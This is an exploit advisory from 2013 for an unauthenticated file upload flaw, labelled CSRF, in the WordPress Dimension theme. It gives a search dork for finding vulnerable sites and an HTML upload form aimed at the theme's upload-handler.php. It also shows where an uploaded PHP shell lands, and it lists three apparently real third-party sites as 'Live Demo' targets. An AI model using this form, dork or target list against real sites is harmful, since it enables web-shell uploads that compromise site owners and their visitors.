WordPress Dimension theme suffers from a cross site request forgery vulnerability.
c79f4bdf46ea63e7957d6c6e13d78d30ac7c626decaf17605d13c77d8d8b5370
#Title : Wordpress Dimension Themes CSRF File Upload Vulnerability
#Author : DevilScreaM
#Date : 11/17/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themeforest.net
#Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/dimension
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
Live Demo :
http://kevinfortuneuk.com/wp-content/themes/dimension/library/includes/upload-handler.php
http://boyjansen.com/wp-content/themes/dimension/library/includes/upload-handler.php
http://jbconsultgroup.com/wp-content/themes/dimension/library/includes/upload-handler.php